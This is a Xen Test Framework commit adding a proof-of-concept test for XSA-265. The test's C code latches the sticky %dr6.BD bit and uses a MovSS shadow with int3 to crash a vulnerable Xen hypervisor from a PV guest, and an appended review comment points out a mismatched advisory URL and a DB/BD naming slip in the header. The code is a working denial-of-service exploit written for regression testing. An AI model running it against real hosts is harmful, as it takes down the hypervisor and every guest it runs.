From: Andrew Cooper Date: Mon, 25 Jun 2018 15:53:10 +0000 (+0100) Subject: XSA-265 PoC X-Git-Url: http://xenbits.xensource.com/gitweb?a=commitdiff_plain;h=f3702a5d29e94814991988bf8747341e18a2e8f5;p=xtf.git XSA-265 PoC Signed-off-by: Andrew Cooper
---
diff --git a/docs/all-tests.dox b/docs/all-tests.dox
index f8a495a..177e398 100644
--- a/docs/all-tests.dox
+++ b/docs/all-tests.dox
@@ -120,6 +120,9 @@ guest breakout.
 @subpage test-xsa-261 - vHPET interrupt injection memory corruption.
+@subpage test-xsa-265 - x86: @#DB exception safety check can be triggered by a
+guest.
+
 @section index-utility Utilities
diff --git a/tests/xsa-265/Makefile b/tests/xsa-265/Makefile
new file mode 100644
index 0000000..fa6aaf6
--- /dev/null
+++ b/tests/xsa-265/Makefile
@@ -0,0 +1,9 @@
+include $(ROOT)/build/common.mk
+
+NAME := xsa-265
+CATEGORY := xsa
+TEST-ENVS := pv64
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-265/main.c b/tests/xsa-265/main.c
new file mode 100644
index 0000000..760ba49
--- /dev/null
+++ b/tests/xsa-265/main.c
@@ -0,0 +1,61 @@
+/**
+ * @file tests/xsa-265/main.c
+ * @ref test-xsa-265
+ *
+ * @page test-xsa-265 XSA-265
+ *
+ * Advisory: [XSA-265](http://xenbits.xen.org/xsa/advisory-264.html)
+ *
+ * One of the fixes for
+ * [XSA-260](http://xenbits.xen.org/gitweb/?p=xen.git;a=commitdiff;h=75d6828bc2146d0eea16adc92376951a310d94a7)
+ * introduced logic to try and prevent livelocks of @#DB exceptions in
+ * hypervisor context. However, it failed to account for the fact that some
+ * %dr6 bits are sticky and never cleared by hardware.
+ *
+ * This test sets the sticky `%%dr6.DB` bit, then uses a `MovSS` shadow to
+ * deliver a @#DB exception in hypervisor context. A vulnerable Xen will
+ * trigger the safety check and crash.
+ *
+ * @see tests/xsa-265/main.c
+ */
+#include
+
+const char test_title[] = "XSA-265 PoC";
+
+void test_main(void)
+{
+ unsigned int ss = read_ss();
+ unsigned long dr7 = DR7_SYM(0, L, G, RW, 32) | X86_DR7_LE | X86_DR7_GE;
+
+ /* Latch the sticky General Detect flag in %dr6 */
+ write_dr6(X86_DR6_BD);
+
+ /* Data breakpoint for `ss`, working around Xen's %dr7 latching bug. */
+ write_dr0(_u(&ss));
+ write_dr7(dr7);
+ write_dr7(dr7);
+
+ asm volatile ("mov %[ss], %%ss; int3; 1:"
+ _ASM_TRAP_OK(1b)
+ :: [ss] "m" (ss), "X" (ex_record_fault_eax));
+
+ /*
+ * If Xen is still alive at this point, the erroneous safety check didn't
+ * trip.
+ */
+
+ write_dr7(0);
+ write_dr7(0);
+
+ xtf_success("Success: Not vulnerable to XSA-265\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */
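Review bot: The file header in this hunk is inconsistent with the code it documents in two places. The advisory line is labelled XSA-265 but its URL ends in `advisory-264.html`; presumably it should point at the XSA-265 advisory page. The description says the test latches `%%dr6.DB`, while the code writes `X86_DR6_BD` and the inline comment calls it the General Detect flag, so the docblock should read `%%dr6.BD` to match the sticky DR6.BD bit actually being set. The doubled `write_dr7(0);` at the end of test_main carries none of the explanation given for the doubled `write_dr7(dr7);` above it; a comment such as `/* Cleared twice for the same %dr7 latching bug as above. */` would stop a later reader from "deduplicating" the second call.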